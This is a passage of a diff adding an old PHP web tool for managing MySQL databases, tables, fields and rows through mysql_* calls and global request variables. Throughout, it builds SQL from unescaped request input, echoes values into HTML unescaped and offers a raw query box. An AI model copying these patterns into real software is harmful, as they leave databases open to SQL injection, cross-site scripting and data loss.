+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; 
+URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' 
+onClick=\"return confirm('Drop Database 
+\'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' 
+onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a 
+href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add 
+Field</a> | \n";
+	echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View 
+Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a 
+href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' 
+onClick=\"return confirm('Drop Field 
+\'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of 
+digits 
+following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == 
+"tinyint" ) 
+echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == 
+"smallint" 
+) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == 
+"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) 
+echo 
+"checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" 
+) 
+echo "checked";?>>BIGINT (-9223372036854775808 ~ 
+9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) 
+echo 
+"checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" 
+) 
+echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == 
+"decimal" ) 
+echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) 
+echo 
+"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == 
+"datetime" 
+) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 
+23:59:59, 
+YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == 
+"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 
+2106..., 
+YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) 
+echo 
+"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) 
+echo 
+"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) 
+echo 
+"checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == 
+"varchar" ) 
+echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == 
+"tinytext" 
+) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) 
+echo 
+"checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == 
+"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == 
+"longtext" 
+) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == 
+"tinyblob" 
+) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) 
+echo 
+"checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == 
+"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == 
+"longblob" 
+) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) 
+echo 
+"checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) 
+echo 
+"checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value 
+list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo 
+"value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo 
+"value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? 
+if( 
+strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( 
+strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( 
+strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( 
+$valuelist 
+!= "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto 
+increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
+if( 
+$fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( 
+$fielddefault != 
+"" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment 
+value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo 
+"checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY 
+KEY" 
+<? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, 
+$PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, 
+$auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, 
+$rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a 
+href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add 
+Data</a> | \n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a 
+href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a 
+href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' 
+onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form 
+action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' 
+method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE 
+$key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len 
+name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname 
+value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
